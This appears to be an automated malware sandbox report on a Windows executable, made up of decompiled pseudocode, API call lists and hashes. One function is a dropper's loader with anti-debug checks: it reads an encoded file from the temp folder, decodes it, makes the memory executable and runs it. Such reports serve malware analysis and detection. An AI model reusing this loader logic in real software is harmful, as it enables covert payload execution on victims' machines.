                                                                              					__eflags = _a8 & 0x00000002;
                                                                              					if((_a8 & 0x00000002) == 0) {
                                                                              						goto L28;
                                                                              					}
                                                                              					goto L5;
                                                                              				}
                                                                              			}
                                                                              0x0040530c
                                                                              0x00405310
                                                                              0x00405319
                                                                              0x0040531c
                                                                              0x0040531f
                                                                              0x00405327
                                                                              0x00405329
                                                                              0x0040532a
                                                                              0x00000000
                                                                              0x0040532a
                                                                              0x00405339
                                                                              0x00405339
                                                                              0x0040533c
                                                                              0x0040533f
                                                                              0x00405353
                                                                              0x0040535a
                                                                              0x0040535f
                                                                              0x00405361
                                                                              0x00405371
                                                                              0x00405363
                                                                              0x00405369
                                                                              0x00405369
                                                                              0x0040537c
                                                                              0x00405391
                                                                              0x00405393
                                                                              0x00405399
                                                                              0x0040539c
                                                                              0x0040539f
                                                                              0x00405461
                                                                              0x00405461
                                                                              0x00405465
                                                                              0x00405467
                                                                              0x00405467
                                                                              0x00405467
                                                                              0x00405467
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004053a5
                                                                              0x004053a5
                                                                              0x004053ae
                                                                              0x004053b4
                                                                              0x004053b9
                                                                              0x004053bc
                                                                              0x004053be
                                                                              0x004053c2
                                                                              0x004053c4
                                                                              0x004053c4
                                                                              0x004053c2
                                                                              0x004053c7
                                                                              0x004053ca
                                                                              0x004053dd
                                                                              0x004053df
                                                                              0x004053e4
                                                                              0x004053ea
                                                                              0x004053ec
                                                                              0x00405407
                                                                              0x0040540e
                                                                              0x00405414
                                                                              0x00405416
                                                                              0x0040543b
                                                                              0x00405418
                                                                              0x00405418
                                                                              0x0040541c
                                                                              0x00405430
                                                                              0x0040541e
                                                                              0x00405421
                                                                              0x00405429
                                                                              0x00405429
                                                                              0x0040541c
                                                                              0x004053ee
                                                                              0x004053f4
                                                                              0x004053f6
                                                                              0x004053fc
                                                                              0x004053fc
                                                                              0x004053f6
                                                                              0x00000000
                                                                              0x004053ec
                                                                              0x004053cc
                                                                              0x004053cf
                                                                              0x004053d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004053d3
                                                                              0x004053d5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004053d7
                                                                              0x004053db
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405440
                                                                              0x0040544a
                                                                              0x00405450
                                                                              0x00405450
                                                                              0x0040545b
                                                                              0x00000000
                                                                              0x00405341
                                                                              0x00405341
                                                                              0x00405343
                                                                              0x0040546b
                                                                              0x0040546e
                                                                              0x00405471
                                                                              0x004054c9
                                                                              0x004054c9
                                                                              0x004054c9
                                                                              0x00405473
                                                                              0x00405476
                                                                              0x00405481
                                                                              0x00405486
                                                                              0x00405488
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040548b
                                                                              0x00405496
                                                                              0x0040549d
                                                                              0x004054a3
                                                                              0x004054a5
                                                                              0x00000000
                                                                              0x004054c1
                                                                              0x004054a7
                                                                              0x004054ab
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004054b0
                                                                              0x00000000
                                                                              0x004054b7
                                                                              0x00405478
                                                                              0x00405478
                                                                              0x00000000
                                                                              0x00405478
                                                                              0x00405349
                                                                              0x0040534d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040534d

                                                                              APIs
                                                                              • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040531F
                                                                              • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00405369
                                                                              • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040537C
                                                                              • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00405382
                                                                              • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00405393
                                                                              • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                                                              • FindClose.KERNEL32(?), ref: 0040545B
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\NdBLyH2h5d.exe" , xrefs: 0040530B
                                                                              • \*.*, xrefs: 00405363
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\NdBLyH2h5d.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-2473244286
                                                                              • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                              • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                                                              • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                              • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 84%
                                                                              			E740D1000() {
                                                                              				long _v8;
                                                                              				void* _v12;
                                                                              				short _v532;
                                                                              				void* _t15;
                                                                              				int _t19;
                                                                              				struct _OVERLAPPED* _t30;
                                                                              				long _t38;
                                                                              				void* _t41;
                                                                              
                                                                              				_t30 = 0;
                                                                              				_v8 = 0;
                                                                              				if(IsDebuggerPresent() != 0) {
                                                                              					DebugBreak();
                                                                              				}
                                                                              				_t15 = GetTempPathW(0x103,  &_v532);
                                                                              				if(_t15 != 0) {
                                                                              					lstrcatW( &_v532, L"\\ur15t24pnyduhs");
                                                                              					_t15 = CreateFileW( &_v532, 0x80000000, 7, _t30, 3, 0x80, _t30); // executed
                                                                              					_v12 = _t15;
                                                                              					if(_t15 != 0xffffffff) {
                                                                              						_t19 = GetFileSize(_t15, _t30);
                                                                              						_t38 = _t19;
                                                                              						if(_t38 == 0xffffffff) {
                                                                              							L11:
                                                                              							return _t19;
                                                                              						}
                                                                              						_t19 = VirtualAlloc(_t30, _t38, 0x3000, 4); // executed
                                                                              						_t41 = _t19;
                                                                              						if(_t41 == 0) {
                                                                              							L10:
                                                                              							goto L11;
                                                                              						}
                                                                              						_t19 = ReadFile(_v12, _t41, _t38,  &_v8, _t30); // executed
                                                                              						if(_t19 == 0) {
                                                                              							goto L10;
                                                                              						}
                                                                              						if(_v8 <= _t30) {
                                                                              							L9:
                                                                              							VirtualProtect(_t41, _t38, 0x40,  &_v8); // executed
                                                                              							_t19 =  *_t41(); // executed
                                                                              							goto L10;
                                                                              						} else {
                                                                              							goto L8;
                                                                              						}
                                                                              						do {
                                                                              							L8:
                                                                              							asm("rol cl, 0x3");
                                                                              							 *((char*)(_t41 + _t30)) =  !( !(0x00000026 - ( !( *((intOrPtr*)(_t41 + _t30)) + 0x1b) + 0x0000005b ^ _t30) - 0x00000020 ^ 0x000000a7) - _t30) + 0x4f;
                                                                              							_t30 =  &(_t30->Internal);
                                                                              						} while (_t30 < _v8);
                                                                              						goto L9;
                                                                              					}
                                                                              				}
                                                                              				return _t15;
                                                                              			}
                                                                              0x740d100a
                                                                              0x740d100c
                                                                              0x740d1017
                                                                              0x740d1019
                                                                              0x740d1019
                                                                              0x740d102b
                                                                              0x740d1033
                                                                              0x740d1045
                                                                              0x740d1062
                                                                              0x740d1068
                                                                              0x740d106e
                                                                              0x740d1073
                                                                              0x740d1079
                                                                              0x740d107e
                                                                              0x740d10ea
                                                                              0x00000000
                                                                              0x740d10ea
                                                                              0x740d108a
                                                                              0x740d1090
                                                                              0x740d1094
                                                                              0x740d10e9
                                                                              0x00000000
                                                                              0x740d10e9
                                                                              0x740d10a0
                                                                              0x740d10a8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x740d10ad
                                                                              0x740d10d9
                                                                              0x740d10e1
                                                                              0x740d10e7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x740d10af
                                                                              0x740d10af
                                                                              0x740d10c1
                                                                              0x740d10d0
                                                                              0x740d10d3
                                                                              0x740d10d4
                                                                              0x00000000
                                                                              0x740d10af
                                                                              0x740d106e
                                                                              0x740d10ed

                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32 ref: 740D100F
                                                                              • DebugBreak.KERNEL32 ref: 740D1019
                                                                              • GetTempPathW.KERNEL32(00000103,?), ref: 740D102B
                                                                              • lstrcatW.KERNEL32(?,\ur15t24pnyduhs), ref: 740D1045
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 740D1062
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 740D1073
                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 740D108A
                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 740D10A0
                                                                              • VirtualProtect.KERNELBASE(00000000,00000000,00000040,?), ref: 740D10E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.221190830.00000000740D1000.00000080.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                                              • Associated: 00000000.00000002.221175968.00000000740D0000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.221197609.00000000740D2000.00000008.00020000.sdmp
                                                                              • Associated: 00000000.00000002.221201849.00000000740D3000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: File$Virtual$AllocBreakCreateDebugDebuggerPathPresentProtectReadSizeTemplstrcat
                                                                              • String ID: \ur15t24pnyduhs
                                                                              • API String ID: 1306962974-680157355
                                                                              • Opcode ID: 64ebc9382491af248a9db53b96dac7511460e5add4ad8dec7203493ad6a04ced
                                                                              • Instruction ID: 7c2958d9084aadc10a4a70f969e6b234e890ef9588bacc29a1a3feb07f049fb7
                                                                              • Opcode Fuzzy Hash: 64ebc9382491af248a9db53b96dac7511460e5add4ad8dec7203493ad6a04ced
                                                                              • Instruction Fuzzy Hash: 9721B476600364BFE7209AB28CADFDB7FBCEB04B50F100565BA02D6080DA7496498F20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 64%
                                                                              			E00401FDC(int __ebx) {
                                                                              				struct HINSTANCE__* _t20;
                                                                              				struct HINSTANCE__* _t27;
                                                                              				int _t28;
                                                                              				struct HINSTANCE__* _t33;
                                                                              				CHAR* _t35;
                                                                              				intOrPtr* _t36;
                                                                              				void* _t37;
                                                                              
                                                                              				_t28 = __ebx;
                                                                              				 *(_t37 - 4) = 1;
                                                                              				SetErrorMode(0x8001); // executed
                                                                              				if( *0x7a3030 < __ebx) {
                                                                              					_push(0xffffffe7);
                                                                              					goto L14;
                                                                              				} else {
                                                                              					_t35 = E00402A9A(0xfffffff0);
                                                                              					 *(_t37 + 8) = E00402A9A(1);
                                                                              					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                                                              						L3:
                                                                              						_t20 = LoadLibraryA(_t35); // executed
                                                                              						_t33 = _t20;
                                                                              						if(_t33 == _t28) {
                                                                              							_push(0xfffffff6);
                                                                              							L14:
                                                                              							E00401428();
                                                                              						} else {
                                                                              							goto L4;
                                                                              						}
                                                                              					} else {
                                                                              						_t27 = GetModuleHandleA(_t35); // executed
                                                                              						_t33 = _t27;
                                                                              						if(_t33 != __ebx) {
                                                                              							L4:
                                                                              							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                                                              							if(_t36 == _t28) {
                                                                              								E00404D62(0xfffffff7,  *(_t37 + 8));
                                                                              							} else {
                                                                              								 *(_t37 - 4) = _t28;
                                                                              								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                                                              									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
                                                                              								} else {
                                                                              									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
                                                                              									if( *_t36() != 0) {
                                                                              										 *(_t37 - 4) = 1;
                                                                              									}
                                                                              								}
                                                                              							}
                                                                              							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                                                              								FreeLibrary(_t33);
                                                                              							}
                                                                              						} else {
                                                                              							goto L3;
                                                                              						}
                                                                              					}
                                                                              				}
                                                                              				SetErrorMode(_t28);
                                                                              				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
                                                                              				return 0;
                                                                              			}
                                                                              0x00401fdc
                                                                              0x00401fe4
                                                                              0x00401fe7
                                                                              0x00401ff3
                                                                              0x00402093
                                                                              0x00000000
                                                                              0x00401ff9
                                                                              0x00402001
                                                                              0x0040200b
                                                                              0x0040200e
                                                                              0x0040201d
                                                                              0x0040201e
                                                                              0x00402024
                                                                              0x00402028
                                                                              0x0040208f
                                                                              0x00402095
                                                                              0x00402095
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402010
                                                                              0x00402011
                                                                              0x00402017
                                                                              0x0040201b
                                                                              0x0040202a
                                                                              0x00402034
                                                                              0x00402038
                                                                              0x0040207c
                                                                              0x0040203a
                                                                              0x0040203d
                                                                              0x00402040
                                                                              0x00402070
                                                                              0x00402042
                                                                              0x00402045
                                                                              0x0040204e
                                                                              0x00402050
                                                                              0x00402050
                                                                              0x0040204e
                                                                              0x00402040
                                                                              0x00402084
                                                                              0x00402087
                                                                              0x00402087
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040201b
                                                                              0x0040200e
                                                                              0x0040209b
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                              • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                              • SetErrorMode.KERNEL32 ref: 0040209B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 1609199483-0
                                                                              • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                              • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                                                              • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                              • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00405C94(CHAR* _a4) {
                                                                              				void* _t3;
                                                                              				void* _t8;
                                                                              
                                                                              				SetErrorMode(0x8001); // executed
                                                                              				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
                                                                              				_t8 = _t3; // executed
                                                                              				SetErrorMode(0); // executed
                                                                              				if(_t8 == 0xffffffff) {
                                                                              					return 0;
                                                                              				}
                                                                              				FindClose(_t8); // executed
                                                                              				return 0x7a15d0;
                                                                              			}
                                                                              0x00405ca2
                                                                              0x00405cae
                                                                              0x00405cb6
                                                                              0x00405cb8
                                                                              0x00405cbd
                                                                              0x00000000
                                                                              0x00405cca
                                                                              0x00405cc0
                                                                              0x00000000

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ), ref: 00405CA2
                                                                              • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                              • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                              • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: ErrorFindMode$CloseFileFirst
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2885216544-3916508600
                                                                              • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                              • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                              • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                              • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 89%
                                                                              			E00403526() {
                                                                              				intOrPtr _v4;
                                                                              				intOrPtr _v8;
                                                                              				int _v12;
                                                                              				int _v16;
                                                                              				char _v20;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				intOrPtr* _t20;
                                                                              				void* _t28;
                                                                              				void* _t30;
                                                                              				int _t31;
                                                                              				void* _t34;
                                                                              				struct HINSTANCE__* _t37;
                                                                              				int _t38;
                                                                              				int _t42;
                                                                              				char _t61;
                                                                              				CHAR* _t63;
                                                                              				signed char _t67;
                                                                              				CHAR* _t78;
                                                                              				intOrPtr _t80;
                                                                              				CHAR* _t82;
                                                                              				CHAR* _t84;
                                                                              				CHAR* _t85;
                                                                              
                                                                              				_t80 =  *0x7a2f88;
                                                                              				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
                                                                              				_t88 = _t20;
                                                                              				if(_t20 == 0) {
                                                                              					_t78 = 0x79f580;
                                                                              					"1033" = 0x7830;
                                                                              					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
                                                                              					__eflags =  *0x79f580;
                                                                              					if(__eflags == 0) {
                                                                              						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
                                                                              					}
                                                                              					lstrcatA("1033", _t78);
                                                                              				} else {
                                                                              					E0040591D("1033",  *_t20() & 0x0000ffff);
                                                                              				}
                                                                              				E004037F2(_t75, _t88);
                                                                              				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                              				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
                                                                              				if(E004055AC(_t88, _t84) != 0) {
                                                                              					L16:
                                                                              					if(E004055AC(_t96, _t84) == 0) {
                                                                              						_push( *((intOrPtr*)(_t80 + 0x118)));
                                                                              						_push(_t84);
                                                                              						E004059E1(0, _t78, _t80);
                                                                              					}
                                                                              					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
                                                                              					 *0x7a2768 = _t28;
                                                                              					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                              						L21:
                                                                              						if(E00401410(0) == 0) {
                                                                              							_t30 = E004037F2(_t75, __eflags);
                                                                              							__eflags =  *0x7a3020;
                                                                              							if( *0x7a3020 != 0) {
                                                                              								_t31 = E00404E34(_t30, 0);
                                                                              								__eflags = _t31;
                                                                              								if(_t31 == 0) {
                                                                              									E00401410(1);
                                                                              									goto L33;
                                                                              								}
                                                                              								__eflags =  *0x7a274c;
                                                                              								if( *0x7a274c == 0) {
                                                                              									E00401410(2);
                                                                              								}
                                                                              								goto L22;
                                                                              							}
                                                                              							ShowWindow( *0x79f560, 5);
                                                                              							_t85 = "RichEd20.dll";
                                                                              							_t37 = LoadLibraryA(_t85);
                                                                              							__eflags = _t37;
                                                                              							if(_t37 == 0) {
                                                                              								M004092B6 = 0x3233;
                                                                              								LoadLibraryA(_t85);
                                                                              							}
                                                                              							_t82 = "RichEdit20A";
                                                                              							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
                                                                              							__eflags = _t38;
                                                                              							if(_t38 == 0) {
                                                                              								 *0x4092ac = 0;
                                                                              								GetClassInfoA(0, _t82, 0x7a2720);
                                                                              								 *0x7a2744 = _t82;
                                                                              								 *0x4092ac = 0x32;
                                                                              								RegisterClassA(0x7a2720);
                                                                              							}
                                                                              							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
                                                                              							E00401410(5);
                                                                              							return _t42;
                                                                              						}
                                                                              						L22:
                                                                              						_t34 = 2;
                                                                              						return _t34;
                                                                              					} else {
                                                                              						_t75 =  *0x7a2f80;
                                                                              						 *0x7a2734 = _t28;
                                                                              						_v20 = 0x624e5f;
                                                                              						 *0x7a2724 = E00401000;
                                                                              						 *0x7a2730 =  *0x7a2f80;
                                                                              						 *0x7a2744 =  &_v20;
                                                                              						if(RegisterClassA(0x7a2720) == 0) {
                                                                              							L33:
                                                                              							__eflags = 0;
                                                                              							return 0;
                                                                              						}
                                                                              						_t12 =  &_v16; // 0x624e5f
                                                                              						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                              						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
                                                                              						goto L21;
                                                                              					}
                                                                              				} else {
                                                                              					_t75 =  *(_t80 + 0x48);
                                                                              					if(_t75 == 0) {
                                                                              						goto L16;
                                                                              					}
                                                                              					_t78 = 0x7a1f20;
                                                                              					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
                                                                              					_t61 =  *0x7a1f20; // 0x52
                                                                              					if(_t61 == 0) {
                                                                              						goto L16;
                                                                              					}
                                                                              					if(_t61 == 0x22) {
                                                                              						_t78 = 0x7a1f21;
                                                                              						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
                                                                              					}
                                                                              					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                              					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
                                                                              						L15:
                                                                              						E004059BF(_t84, E004054CC(_t78));
                                                                              						goto L16;
                                                                              					} else {
                                                                              						_t67 = GetFileAttributesA(_t78);
                                                                              						if(_t67 == 0xffffffff) {
                                                                              							L14:
                                                                              							E00405513(_t78);
                                                                              							goto L15;
                                                                              						}
                                                                              						_t96 = _t67 & 0x00000010;
                                                                              						if((_t67 & 0x00000010) != 0) {
                                                                              							goto L15;
                                                                              						}
                                                                              						goto L14;
                                                                              					}
                                                                              				}
                                                                              			}

                                                                              0x0040352c
                                                                              0x0040353d
                                                                              0x00403544
                                                                              0x00403546
                                                                              0x0040355a
                                                                              0x0040355f
                                                                              0x00403575
                                                                              0x0040357a
                                                                              0x00403580
                                                                              0x00403592
                                                                              0x00403592
                                                                              0x0040359d
                                                                              0x00403548
                                                                              0x00403553
                                                                              0x00403553
                                                                              0x004035a2
                                                                              0x004035ac
                                                                              0x004035b5
                                                                              0x004035c1
                                                                              0x00403647
                                                                              0x0040364f
                                                                              0x00403651
                                                                              0x00403657
                                                                              0x00403658
                                                                              0x00403658
                                                                              0x0040366e
                                                                              0x00403674
                                                                              0x00403682
                                                                              0x00403711
                                                                              0x00403719
                                                                              0x00403723
                                                                              0x00403728
                                                                              0x0040372e
                                                                              0x004037c0
                                                                              0x004037c5
                                                                              0x004037c7
                                                                              0x004037e3
                                                                              0x00000000
                                                                              0x004037e3
                                                                              0x004037c9
                                                                              0x004037cf
                                                                              0x004037d7
                                                                              0x004037d7
                                                                              0x00000000
                                                                              0x004037cf
                                                                              0x0040373c
                                                                              0x00403748
                                                                              0x0040374e
                                                                              0x00403750
                                                                              0x00403752
                                                                              0x00403755
                                                                              0x0040375e
                                                                              0x0040375e
                                                                              0x00403766
                                                                              0x0040376e
                                                                              0x00403770
                                                                              0x00403772
                                                                              0x00403777
                                                                              0x0040377d
                                                                              0x00403780
                                                                              0x00403786
                                                                              0x0040378d
                                                                              0x0040378d
                                                                              0x004037ac
                                                                              0x004037b6
                                                                              0x00000000
                                                                              0x004037bb
                                                                              0x0040371b
                                                                              0x0040371d
                                                                              0x00000000
                                                                              0x00403688
                                                                              0x00403688
                                                                              0x0040368e
                                                                              0x00403698
                                                                              0x004036a0
                                                                              0x004036aa
                                                                              0x004036b0
                                                                              0x004036be
                                                                              0x004037e8
                                                                              0x004037e8
                                                                              0x00000000
                                                                              0x004037e8
                                                                              0x004036c4
                                                                              0x004036cd
                                                                              0x0040370c
                                                                              0x00000000
                                                                              0x0040370c
                                                                              0x004035c7
                                                                              0x004035c7
                                                                              0x004035cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004035d6
                                                                              0x004035e5
                                                                              0x004035ea
                                                                              0x004035f1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004035f5
                                                                              0x004035f7
                                                                              0x00403604
                                                                              0x00403604
                                                                              0x0040360c
                                                                              0x00403612
                                                                              0x0040363a
                                                                              0x00403642
                                                                              0x00000000
                                                                              0x00403624
                                                                              0x00403625
                                                                              0x0040362e
                                                                              0x00403634
                                                                              0x00403635
                                                                              0x00000000
                                                                              0x00403635
                                                                              0x00403630
                                                                              0x00403632
